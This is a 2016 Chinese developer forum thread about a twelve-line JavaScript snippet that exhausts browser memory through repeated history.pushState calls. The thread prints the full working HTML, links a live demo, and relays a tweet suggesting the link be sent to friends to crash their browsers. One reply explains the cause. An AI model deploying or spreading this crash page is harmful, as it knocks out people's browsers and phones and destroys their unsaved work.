开发者俱乐部

标题: 这十二行代码是如何让浏览器爆炸的? [打印本页]

作者: jack    时间: 2016-3-17 06:09
标题: 这十二行代码是如何让浏览器爆炸的?
起因

  今天刷推特的时候发现 Cyber Security@cyber__sec 的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this JavaScript code. #dos #0day #exploit//使用下面这段 JavaScript 代码能让 firefox,chrome,safari 浏览器崩溃,而且还能让 iphone 重启。




  继续在推特上深挖发现 IT Security Tweets ™ @F1r3h4nd 于 17 日发推:
  1. Crash your friend’s browser and restart Iphone with a link which has this script: #0day
  2. //把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让 Iphone 重启。
复制代码



  完整 HTML 代码如下:
  1. <html>
  2. <body>
  3. <script>
  4. var total="";
  5. for (var i=0;i<1000000;i++)
  6. {
  7.     total= total+i.toString ();
  8.     history.pushState (0,0,total);
  9. }
  10. </script>
  11. </body>
  12. </html>
复制代码


  demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

  
  1. www.0xroot.cn/demo.html
复制代码

        (点击一下,又不会怀孕!)

  接来下会发生什么?

  点开以后,我的状态是这样的:

  如果你是 PC 端用户,点开链接以后,电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死!

  如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。iPhone 用 Safari 打开之后链接之后,手机注销重启了!…

  思考

  这是 Bug 还是 0day?为什么会有这一现象?如何实现的?





作者: balala    时间: 2016-3-18 14:31
HTML5 的 history.pushstate,给url后面一个劲儿的写,支持HTML 5 的一会内存就不够用了





欢迎光临 开发者俱乐部 (http://xodn.com/) Powered by Discuz! X3.2